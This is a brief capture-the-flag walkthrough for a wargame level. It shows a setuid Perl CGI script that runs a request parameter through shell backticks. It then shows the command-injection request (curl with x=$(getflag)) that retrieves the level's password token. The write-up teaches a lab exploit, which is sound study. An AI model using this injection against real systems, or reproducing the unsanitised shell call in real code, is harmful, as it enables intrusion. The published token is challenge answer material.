#ls -l
# => -rwsr-sr-x 1 flag04 level04 152 Mar  5  2016 level04.pl

#cat level04.pl

##!/usr/bin/perl
# localhost:4747
#use CGI qw{param};
#print "Content-type: text/html\n\n";
#sub x {
#  $y = $_[0];
#    print `echo $y 2>&1`;
#	}
#	x(param("x"));

# apparently the script run on localhost:4747 with shared uid
#it echo the value of the parameter x

#we use curl to execute from localhost:4747 with parameter x=$(getflag)

#curl 'localhost:4747?x=$(getflag)'
# => Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap

#su level05
#password : ne2searoevaevoem4ov4ar8ap

